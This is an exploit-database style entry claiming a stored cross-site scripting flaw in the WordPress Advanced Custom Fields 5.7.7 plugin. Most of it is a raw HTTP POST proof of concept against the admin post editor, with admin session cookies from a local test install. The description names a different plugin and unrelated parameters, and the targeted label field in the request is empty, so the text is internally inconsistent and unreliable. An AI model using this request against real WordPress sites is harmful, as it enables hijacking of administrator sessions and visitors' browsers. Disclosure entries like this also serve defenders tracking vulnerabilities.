WordPress Plugin Advanced-Custom-Fields 5.7.7 - Cross-Site Scripting
2018-12-03 10:36:57# Exploit Title: Wordpress Plugins Advanced-custom-fields 5.7.7 - Cross-Site Scripting
# Google Dork: N/A
# Date: 2018-12-02
# Exploit Author: Loading Kura Kura
# Vendor Homepage: https://www.advancedcustomfields.com/]
# Software Link: https://www.advancedcustomfields.com/
# Version: 5.7.7
# Tested on: Win10 x64/Kali linux x64
# CVE : N/A
# description:
# A Stored Cross-site scripting (XSS) was discovered in wordpress plugins easy testimonials 3.2.
# Three parameters(_ikcf_client _ikcf_position _ikcf_other) have Cross-Site Scripting.
# Paramater: acf_fields[11][label]
# PoC
POST /wordpress/wp-admin/post.php HTTP/1.1
Host: localhost
Content-Length: 2838
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost/wordpress/wp-admin/post.php?post=8&action=edit
Accept-Encoding: gzip, deflate
Accept-Language: id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7,da;q=0.6
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin|1543850245|LBSY8ANOj9TKCX2YpnzKJoZ5N75oRW4ZGkZZrw5INPt|74dd4284fad8e2f658d13db3d669d0d61976654b4b9e7b4a820b0156fb018264; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin|1543850245|LBSY8ANOj9TKCX2YpnzKJoZ5N75oRW4ZGkZZrw5INPt|d0b0455678fae203a81b5c23b42dbfa51b0ab665e33607d2b09b1d5d62cc36be; wp-settings-time-1=1543678278; wp-settings-1=mfold=o; hblid=gR3SowbFiR0QuMDg3m39N0I6Bo2jr38A; olfsk=olfsk8076045099904943; _gcl_au=1.1.201976856.1543314650
Connection: close
_wpnonce=415211ddca&_wp_http_referer=/wordpress/wp-admin/post.php?post=8&action=edit&message=1&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=acf-field-group&original_post_status=publish&referredby=http://localhost/wordpress/wp-admin/post.php?post=8&action=edit&_wp_original_http_referer=http://localhost/wordpress/wp-admin/post.php?post=8&action=edit&post_ID=8&meta-box-order-nonce=2cc12cc441&closedpostboxesnonce=bbd0be706b&post_title=xss&samplepermalinknonce=4f1f2ec280&_acf_screen=field_group&_acf_post_id=8&_acf_nonce=191e753914&_acf_validation=0&_acf_changed=1&_acf_delete_fields=0|9&original_publish=Update&save=Update&acf_fields[11][ID]=11&acf_fields[11][key]=field_5c02a79cc0f83&acf_fields[11][parent]=8&acf_fields[11][menu_order]=0&acf_fields[11][save]=settings&acf_fields[11][label]=&acf_fields[11][name]=&acf_fields[11][type]=text&acf_fields[11][instructions]=&acf_fields[11][required]=0&acf_fields[11][required]=1&acf_fields[11][default_value]=&acf_fields[11][placeholder]=&acf_fields[11][prepend]=&acf_fields[11][append]=&acf_fields[11][maxlength]=&acf_fields[11][conditional_logic]=0&acf_fields[11][wrapper][width]=&acf_fields[11][wrapper][class]=&acf_fields[11][wrapper][id]=&acf_fields[10][ID]=10&acf_fields[10][key]=field_5c02a7abc0f84&acf_fields[10][parent]=8&acf_fields[10][menu_order]=1&acf_fields[10][save]=meta&acf_fields[12][ID]=12&acf_fields[12][key]=field_5c02a7abc0f84&acf_fields[12][parent]=8&acf_fields[12][menu_order]=2&acf_fields[12][save]=meta&acf_field_group[location][group_0][rule_0][param]=post_type&acf_field_group[location][group_0][rule_0][operator]===&acf_field_group[location][group_0][rule_0][value]=post&acf_field_group[location][group_0][rule_1][param]=post_type&acf_field_group[location][group_0][rule_1][operator]===&acf_field_group[location][group_0][rule_1][value]=post&acf_field_group[active]=0&acf_field_group[active]=1&acf_field_group[style]=default&acf_field_group[position]=normal&acf_field_group[label_placement]=top&acf_field_group[instruction_placement]=label&acf_field_group[menu_order]=0&acf_field_group[description]=ddd&acf_field_group[hide_on_screen]=&acf_field_group[hide_on_screen][]=the_content&acf_field_group[key]=group_5c02a6cfa31d6&post_name=group_5c02a6cfa31d6
Fixes
No fixesIn order to submit a new fix you need to be registered.